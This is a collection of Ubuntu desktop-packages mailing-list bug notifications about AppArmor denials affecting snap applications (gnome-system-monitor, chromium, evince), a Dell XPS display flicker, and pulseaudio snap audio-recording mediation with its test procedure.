type=1400 audit(1529751797.832:45): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1778332/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Nov 11 09:47:56 kernel: audit: type=1400 audit(1573487276.018:797080): apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/run/systemd/sessions/c1" pi d=8733 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 I'm able to reproduce this on 19.10 under X11 (but not Wayland) in the default install. I'll update snap for this denial. That fix should be in snapd 2.43. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1778332 Title: Apparmor Permission Denied (apparmor="DENIED") Status in gnome-system-monitor package in Ubuntu: Expired Bug description: I try to launch the system monitor but nothing show up. journalctl -f Result: Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000) /var/log/syslog Result: Jun 23 19:03:17 laptop-hostname kernel: [ 433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to:
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd (Ubuntu) Status: Triaged => In Progress ** Also affects: apparmor Importance: Undecided Status: New ** Changed in: apparmor Status: New => Triaged ** Changed in: apparmor Importance: Undecided => Low ** Changed in: apparmor Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Triaged Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: In Progress Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1791454] Re: system-monitor produces many apparmor permission denied warnings
Note, these accesses were added in 22d37f834b6f4605faa3887bae3cf4d0e1673278 ** Changed in: gnome-system-monitor (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1791454 Title: system-monitor produces many apparmor permission denied warnings Status in gnome-system-monitor package in Ubuntu: Fix Released Bug description: gnome-system-monitor (installed as snap, latest stable version) on Ubuntu 18.04.1 causes while running many warnings in the system log of the following type: audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap .gnome-system-monitor.gnome-system-monitor" name="/proc/2932/wchan" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap .gnome-system-monitor.gnome-system-monitor" name="/proc/1/cgroup" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 The output of journalctl | grep "operation=\"open\" profile=\"snap.gnome-system-monitor.gnome" | wc -l amounts on my system to 4 924 215 . For comparison journalctl | wc -l amounts to 5 143 715 . Thus it is really spamming my system log. output of snap info gnome-system-monitor is attached. output of lsb_release -rd: Description:Ubuntu 18.04.1 LTS Release:18.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1791454/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
I've added it to my trello card for 2.43 policy updates. ** Changed in: snapd (Ubuntu) Status: New => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu) Status: Confirmed => Triaged ** Changed in: evince (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1849947] [NEW] Dell XPS 13 (7390) Display Flickering - 19.10
Public bug reported: Hi there, I recently purchased a Dell XPS 13 7390 (Developer Edition). I decided to replace 18.4 LTS with 19.10 and so far it has been pretty smooth. However, there is one issue which occurs frequently whereby the display flickers and becomes unusable. The best way to describe the appearance is that the image becomes heavily distorted. Sometimes it only happens for a split second, other times it is permanently distorted. When this happens, simply closing the laptop lip and re-opening seems to put the display back into it's correct state. I didn't experience this issue on 18.04 LTS which is why I believe it's a Software Bug within 19.10. ProblemType: Bug DistroRelease: Ubuntu 19.10 Package: xorg 1:7.7+19ubuntu12 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Uname: Linux 5.3.0-19-generic x86_64 ApportVersion: 2.20.11-0ubuntu8 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Oct 26 11:11:43 2019 DistUpgraded: Fresh install DistroCodename: eoan DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation Device [8086:9b41] (rev 02) (prog-if 00 [VGA controller]) Subsystem: Dell Device [1028:0962] InstallationDate: Installed on 2019-10-25 (0 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) MachineType: Dell Inc. XPS 13 7390 ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.3.0-19-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/23/2019 dmi.bios.vendor: Dell Inc. dmi.bios.version: 1.1.3 dmi.board.name: 0G2D0W dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 10 dmi.chassis.vendor: Dell Inc. dmi.modalias: dmi:bvnDellInc.:bvr1.1.3:bd08/23/2019:svnDellInc.:pnXPS137390:pvr:rvnDellInc.:rn0G2D0W:rvrA00:cvnDellInc.:ct10:cvr: dmi.product.family: XPS dmi.product.name: XPS 13 7390 dmi.product.sku: 0962 dmi.sys.vendor: Dell Inc. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.99-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 19.2.1-1ubuntu1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:1.20.5+git20191008-0ubuntu1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.0.1-1ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20190815-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1 ** Affects: xorg (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug eoan ubuntu -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1849947 Title: Dell XPS 13 (7390) Display Flickering - 19.10 Status in xorg package in Ubuntu: New Bug description: Hi there, I recently purchased a Dell XPS 13 7390 (Developer Edition). I decided to replace 18.4 LTS with 19.10 and so far it has been pretty smooth. However, there is one issue which occurs frequently whereby the display flickers and becomes unusable. The best way to describe the appearance is that the image becomes heavily distorted. Sometimes it only happens for a split second, other times it is permanently distorted. When this happens, simply closing the laptop lip and re-opening seems to put the display back into it's correct state. I didn't experience this issue on 18.04 LTS which is why I believe it's a Software Bug within 19.10. ProblemType: Bug DistroRelease: Ubuntu 19.10 Package: xorg 1:7.7+19ubuntu12 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Uname: Linux 5.3.0-19-generic x86_64 ApportVersion: 2.20.11-0ubuntu8 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Oct 26 11:11:43 2019 DistUpgraded: Fresh install DistroCodename: eoan DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation Device [8086:9b41] (rev 02) (prog-if 00 [VGA controller]) Subsystem: Dell Device [1028:0962] InstallationDate: Installed on 2019-10-25 (0 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) MachineType: Dell Inc. XPS 13 7390 ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.3.0-19-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/23/2019 dmi.bios.vendor: Dell Inc. dmi.bios.version: 1.1.3 dmi.board.name: 0G2D0W dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 10 dmi.chassis.vendor: Dell Inc. dmi.modalias:
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, I'll fix this in the next batch of policy updates for snapd. ** Changed in: snapd (Ubuntu) Importance: Undecided => Low ** Changed in: snapd (Ubuntu) Status: New => Triaged ** Changed in: snapd (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, that is a read on /home/ubuntu/.Private/. Is the encrypted home mounted at the time of the denial? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: New Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Encrypted home is typically setup as ~/.Private, not ~/Private and the policy already allows: owner @{HOME}/.Private/** mrixwlk, owner @{HOMEDIRS}/.ecryptfs/*/.Private/** mrixwlk, The home interface should already allow ~/Private. What is the denial you see in the logs? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: New Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Changed in: pulseaudio (Ubuntu Xenial) Status: In Progress => Triaged ** Changed in: pulseaudio (Ubuntu Bionic) Status: In Progress => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Triaged Status in pulseaudio source package in Bionic: Triaged Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] - Since the pulseaudio mediation behavior triggers when the security label - starts with 'snap.' it is su + IMPORTANT: if updating pulseaudio while the session is running, either + need to reboot for the test or kill pulseaudio so it can restart with + the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict 